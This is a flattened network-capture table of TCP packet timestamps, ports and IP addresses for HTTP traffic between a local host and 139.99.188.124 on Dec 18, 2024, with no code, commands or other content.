                                                          Dec 18, 2024 09:32:36.023232937 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.023274899 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.024194002 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.024332047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.024374008 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.025250912 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.025345087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.025387049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.026396036 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.026480913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.026525974 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.027523041 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.027595043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.027642012 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.028331995 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.028465986 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.028508902 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.029429913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.029490948 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.029531956 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:36.030477047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.030586958 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:36.030633926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.284427881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.284549952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.284600973 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.292843103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.292885065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.292943954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.404071093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.404150009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.404247999 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.407094955 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.427057981 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.427099943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.427115917 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.429877996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.429924011 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.430053949 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.435337067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.435380936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.435389996 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.440869093 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.440916061 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.440949917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.446388006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.446441889 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.446530104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.451948881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.451961994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.452002048 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.457520962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.457568884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.457570076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.463097095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.463146925 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.463231087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.468570948 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.468621016 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.468806982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.474611044 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.474658012 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.474661112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.479614019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.479669094 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.479758024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.485102892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.485157013 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.485224009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.490982056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.490993977 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.491050005 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.496155024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.496206045 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.496270895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.501676083 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.501719952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.501787901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.507234097 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.507332087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.507390022 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.512748957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.512800932 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.512868881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.518311024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.518366098 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.518408060 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.562928915 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.595541954 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.595578909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.595638037 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.597934008 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.598202944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.598257065 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.641127110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.641267061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.641330957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.643205881 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.643368959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.643418074 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.647396088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.647433996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.647488117 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.651727915 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.651810884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.651875019 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.655755043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.655869961 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.655920029 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.660058975 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.660115004 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.660171986 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.664026976 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.664130926 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.664186001 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.668236971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.668355942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.668410063 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.672475100 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.672616005 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.672667027 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.676559925 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.676673889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.676726103 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.680720091 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.680845022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.680892944 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.684914112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.685019016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.685076952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.689210892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.689373970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.689419985 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.693249941 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.693370104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.693428993 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.697696924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.697877884 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.697932005 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.701678991 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.701792002 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.701859951 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.705738068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.705863953 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.705915928 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.710088015 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.710243940 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.710288048 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.714570999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.714718103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.714780092 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.718274117 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.718341112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.718391895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.722410917 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.722554922 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.722606897 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.726604939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.726717949 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.726762056 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.730792999 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.730895996 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.730945110 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.734868050 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.734988928 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.735038996 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.739012957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.739120960 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.739177942 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.743110895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.743294954 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.743349075 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.747240067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.747370958 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.747437000 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.751409054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.751625061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.751671076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.755502939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.755583048 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.755630016 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.759628057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.759748936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.759789944 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.763816118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.763855934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.763931036 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.856265068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.856369019 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.856620073 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.856826067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.856952906 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.857008934 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.858829021 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.858963966 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.859015942 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.860855103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.860961914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.861013889 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.862812042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.862889051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.862935066 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.864811897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.864900112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.864948988 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.866856098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.866898060 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.866947889 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.868778944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.868941069 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.868997097 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.870726109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.870879889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.870930910 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.872680902 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.872802973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.872850895 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.874888897 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.875065088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.875129938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.876571894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.876727104 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.876774073 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.878494978 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.878628016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.878676891 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.880549908 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.880701065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.880749941 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.882297993 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.882420063 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.882466078 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.884413004 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.884569883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.884618998 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.886301994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.886429071 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.886481047 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.887949944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.888092041 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.888133049 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.890351057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.890490055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:39.890537024 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:39.891740084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.274096966 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.274240971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.274302959 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.275356054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.275439024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.275496006 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.276520014 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.276601076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.276655912 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.277733088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.277868986 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.277920961 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.278980017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.279105902 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.279156923 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.280292034 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.280399084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.280443907 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.281436920 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.281603098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.281658888 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.282785892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.283056021 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.283106089 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.283973932 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.284082890 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.284132004 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.285175085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.285331011 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.285378933 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.286465883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.286556005 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.286598921 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.287723064 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.287837982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.287887096 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.288971901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.289110899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.289161921 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.290178061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.290215969 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.290261984 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.291377068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.291512012 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.291594982 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.292619944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.292776108 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.292823076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.293876886 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.294030905 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.294076920 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.295056105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.295172930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.295221090 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.296344995 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.296456099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.296504021 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.297544956 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.297694921 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.297749996 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.298779011 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.298907042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.298954964 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.300106049 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.300357103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.300400972 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.301269054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.301372051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.301419973 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.302525043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.302658081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.302705050 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.303756952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.303812027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.303859949 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.304964066 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.305152893 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.305201054 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.306181908 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.306304932 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.306359053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.307447910 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.307611942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.307660103 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.308664083 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.308957100 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.309001923 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.309912920 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.310005903 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.310049057 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.311130047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.311247110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.311290026 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.312350988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.312515020 CET8049731139.99.188.124192.168.2.4
